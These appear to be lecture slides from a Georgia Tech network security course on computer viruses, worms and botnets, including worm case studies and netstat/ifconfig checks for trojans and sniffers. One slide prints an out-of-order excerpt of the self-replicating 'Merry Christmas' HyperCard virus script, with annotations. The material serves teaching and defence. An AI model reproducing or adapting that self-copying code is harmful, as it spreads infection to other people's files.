310 likes | 431 Views
ECE-6612 http://www.csc.gatech.edu/copeland/jac/6612/ Prof. John A. Copeland john.copeland@ece.gatech.edu 404 894-5177 fax 404 894-0035 Offices: Klaus 3362 email or call for office visit, 404 894-5177 Chapter 9b - Viruses and Worms. Computer Viruses (and other “Malicious Programs).
E N D
ECE-6612 http://www.csc.gatech.edu/copeland/jac/6612/ Prof. John A. Copeland john.copeland@ece.gatech.edu 404 894-5177 fax 404 894-0035 Offices: Klaus 3362 email or call for office visit, 404 894-5177 Chapter 9b - Viruses and Worms
Computer Viruses (and other “Malicious Programs) Computer “Viruses” and related programs have the ability to replicate themselves on an ever increasing number of computers. They originally spread by people sharing floppy disks. Now they spread primarily over the Internet by email, or by sending packets to an open TCP/UDP port (a “Worm”). Peer-to-peer applications are open doors for worms (Napster, Kaaza, Bit Torrent, eDonkey, ...). Other “Malicious Programs” may be installed by hand on a single machine. They may also be built into widely distributed commercial software packages (Spyware or Ad-ware). These are very hard to detect before the payload activates (Trojan Horses, Trap Doors, and Logic Bombs). 2
Definitions Virus - code that copies itself into other programs. A “Bacteria” replicates until it fills all disk space, or CPU cycles. Payload - harmful things the malicious program does, after it has had time to spread. Worm - a program that replicates itself across the network (usually riding on email messages or attached documents (e.g., macro viruses). Email “viruses” are technically “worms”. Trojan Horse - instructions in an otherwise good program that cause bad things to happen (sending your data or password to an attacker over the net). Logic Bomb - malicious code that activates on an event (e.g., date). Trap Door (or Back Door) - undocumented entry point written into code for debugging that can allow unwanted users. “Vulnerability” - a program defect that permits “Intrusions”. Easter Egg - extraneous code that does something “cool.” A way for programmers to show that they control the product. Bot, BotNet - Large network (hundreds to millions) of compromised computers that communicate to commit DDoS, SPAM, Phish. 3
Taxonomy of Malicious Programs Independent Need Host Program Trapdoors Logic Bombs Trojan Horses Viruses Bacteria Worms 4
Virus Phases Dormant - waits for a trigger to start replicating Propagation - copies itself into other programs of the same type on a computer. Spreads when the user shares a file with another computer. Usually searches a file for it’s own signature before infecting. Worms (like Melissa, sobig.a-f, ...) spread as executable attachments to email. Others by sending packets to open TCP or UDP ports. Triggering - starts delivering payload. Sometimes triggered on a certain date, or after a certain time after infection. Execution - payload function is done. Perhaps it put a funny message on the screen, or wiped the hard disk clean. It may become start the first phase over again. 5
Virus Protection Have a well-known virus protection program, configured to scan disks and downloads automatically for known viruses. Use mail servers that screen for viruses and executable files Do not execute programs (or "macro's") from unknown sources (e.g., PS files, Hypercard files, MS Office documents, Java, ...), if you can help it. Configure MS Word and Excel to not automatically execute macros in documents (reset the defaults). Avoid the most common operating systems and email programs, if possible. Eudora will display HTML without danger (if set to not automatically include links from Web). 6
Types of Viruses Parasitic Virus - attaches itself to executable files as part of their code. Runs whenever the host program runs. Memory-resident Virus - Lodges in main memory as part of the residual operating system. Boot Sector Virus - infects the boot sector of a disk, and spreads when the operating system boots up (original DOS viruses). Stealth Virus - explicitly designed to hide from Virus Scanning programs. Polymorphic Virus - mutates with every new host to prevent signature detection. 7
Macro Viruses Microsoft Office applications allow “macros” to be part of the document. The macro could run whenever the document is opened, or when a certain command is selected (e.g., Save File). A macro virus can delete files, generate email, edit letters, or mail itself to everyone on internal mail-address lists. 8
ActiveX Controls ActiveX Controls are reusable software components that are based on Microsoft Component Object Model (COM). Microsoft later modified the Internet Explorer web browser to use them to incorporate applet-like functionality into Web pages. Because of that later use, ActiveX Controls have since been much derided in the mainstream and technical press for their ability to be used by unethical developers to create computer viruses, trojans and spyware infections. ActiveX controls are unsafe for users of Internet Explorer (IE) who turn on the browser's ability to download and activate ActiveX controls within a Web page. The problems occur when a user surfs to a non-trusted web page and that web page contains a malicious ActiveX control. This is a very common means of distributing malware such as adware and spyware to unwitting users of Internet Explorer. * Using IE for reading HTML email from unknown sources is risky. *adapted from Wikipedia 9
Trojan Subcategories Clicker – Generates Web site traffic, the purpose of which is to generate revenue or other malicious purposes. Downloader – Downloads one or more malware components from a remote site and then installs them on the affected system. Dropper – Drops and installs one or more malware components into an affected system. Exploit – Documents or media files containing exploit code. Fraud Tool – Malware used to commit fraud. An example of this could include malware that displays fake errors or infection messages, which then incites the user to purchase fake tools or security software. Generic – Trojans that do not fall within the other subcategories. Infostealer – Spies and/or steals information. Common tools include password stealers, keystroke loggers and spywares. Proxy – Allows a remote attacker to relay connection via the affected system in order to hide its real origin. Rootkit – Components used by other malware to give itself the capability to hide themselves from the user and security software. From: http://www-935.ibm.com/services/us/iss/xforce/trendreports/xforce-2008-annual-report-graphics.zip 10
Historical https://www.cert.org/stats/cert_stats.html 2011 - Weekly Reports (e.g., Feb. 14-20, 2011): http://www.us-cert.gov/cas/bulletins/SB11-052.html 12
Virus Detection 1st Generation, Scanners: searched files for any of a library of known virus “signatures.” Checked executable files for length changes. 2nd Generation, Heuristic Scanners: looks for more general signs than specific signatures (code segments common to many viruses). Checked files for checksum or hash changes. 3rd Generation, Activity Traps: stay resident in memory and look for certain patterns of software behavior (e.g., scanning files). 4th Generation, Full Featured: combine the best of the techniques above. 13
Part of the “Merry Christmas” Macintosh Hypercard Virus if homescript contains key then set cantmodify of this stack to false if not (cantmodify of this stack) then set the script of this stack to ¬ stackscript & return & lastlines(hostscript,homescript) end if else -- domenu "Quit Hypercard" end if set the userlevel to oldlevel set lockrecent to false set lockmessages to false set lockscreen to false end merryxmas function lastlines afterline,stuff put (number of lines in stuff) into total put line (total-53) to total of stuff into host repeat with x = 55 to total put line (total-x+1) of stuff & return & host into host if line 1 of host is afterline then exit repeat end repeat return host end lastlines on openbackground --merryxmas merryxmas "on openbackground --merryxmas" end openbackground on closebackground --merryxmas merryxmas "on closebackground --merryxmas" end closebackground on idle --merryxmas put "on idle --merryxmas" into key if not (the script of this stack contains key) then merryxmas key end idle on merryxmas key set lockscreen to true set lockmessages to true set lockrecent to true put the userlevel into oldlevel set the userlevel to 5 put the script of this stack into stackscript put the script of stack "Home" into homescript put "on openbackground --merryxmas" into hostscript if stackscript contains key then if homescript contains key then else set cantmodify of stack "Home" to false if not (cantmodify of stack "Home") then set the script of stack "Home" to ¬ homescript & return & lastlines(hostscipt,stackscript) end if end if else “merryxmas” is queued to run whenever 3 “events” occur” “lastlines” copies the virus code into the new stack The “key” was used to detect if a “stack” was already infected. The payload was simply to display “Merry Christmas” on the screen on Dec. 25, but in practice it made the use of the Hypercard program excruciatingly slow. It would infect (and later check) every Hypercard document (“stack”) used and the master script of the “Home” stack that Hypercard ran when started up. 14
W32/Swen.A Worm added September 19, 2003 (http://www.cert.org/current/current_activity.html) The CERT/CC has received reports of a new mass-emailing worm, referred to as "W32/Swen.A" or "W32/Gibe.F". This worm is similar to W32/Gibe.B in function. The worm has been reported to propagate through email, network shares, and file-sharing networks such as KaZaA and IRC. It arrives as an attachment. The subject, body, and From: address vary, but often claim to be a Microsoft Internet Explorer Update or a delivery failure notice from qmail. Upon opening the attachment, the worm attempts to mail itself to all e-mail addresses it finds on the system. Additionally, this worm attempts to terminate numerous security product processes on the system. You may also wish to visit the CERT/CC's computer virus resources page, http://www.us-cert.org 15
W32/Sobig.F Worm added August 19 | updated 8/25/2003 (http://www.cert.org/current/current_activity.html) The CERT/CC continues to receive reports of an new variant of the Sobig worm, 'W32/Sobig.F'. Like its' predecessors, Sobig.F attempts to replicate itself by sending out infected email. In addition, it can download and execute arbitrary code on the target machine, which potentially permits the worm to compromise confidential information, or set up and run other services, such as open mail relays. Please refer to CERT Incident Note IN-2003-03, "W32/Sobig.F Worm" for more information. The CERT/CC is not aware of any continued activity related to the "second phase" of the worm's operation as described in the Incident Note, but encourages users who are still compromised to take action to recover their systems. 16
Worms Can Spread All Over in Minutes (“How to Own the Internet in Your Spare Time,” Stuart Staniford, Vern Paxton, Nickolas Weaver) 17
Code Red Worm - Feb. 2001 Exploited vulnerability The worm exploited a vulnerability in the indexing software distributed with IIS, described in MS01-033, for which a patch had been available a month earlier. The worm spread itself using a common type of vulnerability known as a buffer overflow. It did this by using a long string of the repeated character 'N' to overflow a buffer, allowing the worm to execute arbitrary code and infect the machine. Worm payload * It defaced the affected web site to display: HELLO! Welcome to http://www.worm.com! Hacked By Chinese! (The last sentence became a stock phrase to indicate an online defeat) * It tried to spread itself by looking for more IIS servers on the Internet. * It waited 20-27 days after it was installed to launch denial of service attacks on several fixed IP addresses. The IP address of the White House web server was among those.[1] http://en.wikipedia.org/wiki/Code_Red_%28computer_worm%29 18
(“How to Own the Internet in Your Spare Time,” Stuart Staniford, Vern Paxton, Nickolas Weaver) 19
The Sapphire Worm Spread by UDP The Sapphire /Slammer Worm spread by sending a single 404-byte UDP packet (376 data bytes). This meant that no reply was necessary from potential victims and : No pre-scanning of addresses to find valid targets needed. No TCP 3-way handshake needed. Source address could be spoofed, making identification of infected hosts hard. Infected hosts could not be isolated by “ARP cache poisoning,” which only blocks replies. 20
from “The Spread of the Sapphire/Slammer Worm,” David Moore, Vern Paxton, et. al. 21
Spread of the Sapphire/Slammer Worm (1/25/03) www.caida.org Each circle represents the log of the number of infected hosts, 30 minutes after the start. 22
The Witty Worm: A New Chapter in Malware (extracts*) Opinion by Bruce Schneier, Counterpane Internet Security Inc. JUNE 02, 2004 (COMPUTERWORLD) - Witty was a big deal. It represented some scary malware firsts and is likely a harbinger of worms to come. Witty was the first worm to target a particular set of security products -- in this case Internet Security System's BlackICE and RealSecure. It infected and destroyed only computers that had particular versions of this software running. 12,000 machines were the entire vulnerable and exposed population, and Witty infected them all -- worldwide -- in 45 minutes. It's the first worm that quickly corrupted a small population. Previous worms targeting small populations such as Scalper and Slapper were glacially slow. Security company eEye Digital Security discovered the vulnerability in ISS's BlackICE/ RealSecure products on March 8, and ISS released a patched version on March 9. EEye published a high-level description of the vulnerability on March 18. On the evening of March 19, about 36 hours after eEye's public disclosure, the Witty worm was released into the wild. It was less than 700 bytes long. It used a random-number generator to spread itself, avoiding many of the problems that plagued previous worms. It spread by sending itself to random IP addresses with random destination ports, a trick that made it easier to sneak through firewalls. Witty was released through a bot network of about 100 infected machines. Witty marks the first time we've seen a worm do it in the wild. This helped Witty infect every available host in 45 minutes. * http://www.computerworld.com/securitytopics/security/virus/story/0,10801,93584,00.html 23
BotNet (e.g., Storm, Conflicker) 2007-present) Spammer Spammer's "phishing"Web site Infected computers Virus or Trojan Web Traffic Victim's PCs Mail Servers http://en.wikipedia.org/wiki/Storm_botnet 24
“Network Telescope” operated by U. Calif. San Diego The UCSD Network Telescope consists of a large piece of globally announced IPv4 address space. The telescope IP range contains almost no legitimate hosts, so inbound traffic to nonexistent machines is always anomalous in some way. Because the network telescope contains approximately 1/256th of all IPv4 addresses, it receives roughly one out of every 256 packets sent by an Internet worm with an unbiased random number generator. Because we are uniquely situated to receive traffic from every worm-infected host, we provide a global view of the spread of Internet worms. http://www.caida.org/ Info on the Witty Worm: http://www.caida.org/research/security/witty/ 25
Storm Botnet, 2007 - 2008 The botnet named Storm, because it initially spread in email about a storm in Europe, first showed up in 2006. It has gained notoriety through its writers' ability to update and adapt both the malware's code and the spam blasts that lure people to become infected with it. The sparse P2P network mades it difficult to track down the controllers or significantly damage the entire network. GeoCities sites were infected with malicious JavaScript code that redirects the user's browser to secondary URLs hosted in Turkey. The Turkish URLs, meanwhile, try to persuade the user to download a new codec that's supposedly necessary to view images on the GeoCities sites. According to Trend Micro's analysis, the bogus codec (which claims to be for the 360-degree IPIX format) is actually an identity and information-stealing piece of malware. [PC World; Paul Ferguson, Trend Micro Inc, Nov. 2007] Most threat watchers say no one knows who is behind Storm, but Finnish antivirus maker F-Secure, which takes credit for giving Storm its name, says a group called the Zhelatin Gang is responsible and whom the company believes is operating out of Russia. F-Secure also says that Storm is the largest botnet in the world with just more than 1 million infected PCs. [PC World, Sep. 2007]. In Sept. 2008, Microsoft Corp.'s anti-malware utility, the Malicious Software Removal Tool (MSRT), purged nearly 300,000 infected PCs of the infamous Storm Trojan horse [1]. [1] http://www.computerworld.com/s/article/9120727/Hosting_firm_takedown_bags_500_000_bots?taxonomyId=17&pageNumber=1 26
The McColo Takedown (Nov. 2008) The shutdown of a U.S.-based Web hosting company (McColo) crippled more than 500,000 bot compromised computers ("Rustock" and "Srizbi”). They are no longer able to receive commands from criminals, since McColo hosted the command and control servers (URLs and IPs). ["Srizbi” later revived after the bots found a new controller located in Estonia] McColo was disconnected from the Internet by its upstream service providers at the urging of researchers who believed the company's servers hosted a staggering amount of cyber criminal activity, including the command-and-control servers of some of the planet's biggest botnets. Those collections of infected PCs were responsible for as much as 75% of the spam sent worldwide. When McColo went dark, spam volumes dropped by more than 40% in a matter of hours. http://www.computerworld.com/s/article/9120727/Hosting_firm_takedown_bags_500_000_bots 27
Conficker (Conflickter, Downadup, Kido) Bot Nov. 2008-2010+ On October 23, 2008, Microsoft announced a security update that resolved a critical vulnerability in the Windows Server service (MS08-067). The CAIDA network telescope observes a significant fraction of the random scans. We [CAIDA] know that the Conficker software generates a set of ~250 new domain name strings per day, which it later contacts using a HTTP request on TCP/80 [looking for a controller]. This feature implies that Conficker is a worm designed to become a botnet commanded by whoever subsequently registers the quasi-randomly generated set of domain names. This feature also gives analysts a mechanism to collect information on worm spread, by registering one or more of these domains and recording HTTP server logs.[1] From late Nov. through Dec. 2008 [SRI] recorded more than 13,000 Conficker infections within their honeynet, and surveyed more than 1.5 million infected IP addresses from 206 countries. Their cumulative census of Conficker.A indicates that it has affected more than 4.7 million IP addresses, while its successor, Conficker.B, has affected 6.7M IP addresses. We [SRI] have not seen such a dominating infection outbreak since Sasser in 2004. Nor have we seen such a broad spectrum of antivirus tools do such a consistently poor job at detecting malware binary variants since the Storm outbreak of 2007.[2] [1] http://www.caida.org/research/security/ms08-067/conficker.xml, [2] http://mtc.sri.com/Conficker/ 28
Confliker TCP port 445 Scanning (to 1/240 of all IP addresses) We [CAIDA] started recording TCP/445 scanning to the UCSD Network Telescope on October 23, 2008, at which point we saw about 1000-2000 unique source IP addresses per hour scanning TCP/445. Before November 21 we saw up to 3222 unique source IP addresses per hour scanning TCP/445. After November 21 midnight UTC we saw a significant increase in source IP addresses that scan on TCP/445, which has remained high ever since. [TCP port 445 is the Windows Server port] 29 http://www.caida.org/research/security/ms08-067/conficker.xml
Detecting Open Ports on a UNIX Host root# netstat -na -A inet (or “-f inet”) Active Internet connections (including servers) Proto RQ SQ Local Address Foreign Address (state) tcp4 0 0 127.0.0.1.1033 127.0.0.1.735 ESTABLISHED tcp4 0 0 127.0.0.1.735 127.0.0.1.1033 ESTABLISHED tcp4 0 0 *.22 *.* LISTEN tcp4 0 0 *.* *.* CLOSED tcp4 0 0 127.0.0.1.50530 127.0.0.1.631 CLOSE_WAIT tcp4 0 0 127.0.0.1.50529 127.0.0.1.631 CLOSE_WAIT tcp4 0 0 127.0.0.1.631 *.* LISTEN tcp4 0 0 *.* *.* CLOSED tcp4 0 0 127.0.0.1.1033 127.0.0.1.1019 ESTABLISHED tcp4 0 0 127.0.0.1.1019 127.0.0.1.1033 ESTABLISHED tcp4 0 0 127.0.0.1.1033 *.* LISTEN tcp4 0 0 *.27374 *.* LISTEN udp4 0 0 *.* *.* LISTEN “netstat -na -A inet (or “netstat -nao -A inet”) will show open ports on a UNIX system. The local address “127.0.0.1 is the internal loop back port and is not a problem. Here two ports or open for any (*) outside connections: TCP port 22 (SSH - good) and TCP port 27374 (Sub-7 Trojan Horse - bad). The tcp4 *.* and udp4 *.* indicate promiscuous listening (any IP: any port). The “tcp4 *.*” is not good if you are not knowingly running a sniffer. The “udp4 *.*” may just be the OS listening for broadcast messages. 30
“ifconfig” can Detect if Port is Listening to All Packets in Promiscuous (PROMISC) Mode root# ifconfig en0 en0: flags=8863<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.132 netmask 0xffffff00 broadcast 192.168.1.255 ether 00:03:93:80:24:68 media: autoselect (10baseT/UTP <half-duplex>) status: active supported media: none autoselect 10baseT/UTP <half-duplex> 10baseT/UTP <full-duplex> After starting a sniffing program like “tcpdump” or a sniffing Trojan Horse: root# ifconfig en0 en0: flags=8863<UP,BROADCAST,PROMISC,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.132 netmask 0xffffff00 broadcast 192.168.1.255 ether 00:03:93:80:24:68 media: autoselect (10baseT/UTP <half-duplex>) status: active supported media: none autoselect 10baseT/UTP <half-duplex> 10baseT/UTP <full-duplex> 10baseT/UTP On Windows: in "Command Prompt" try "ipconfig" 31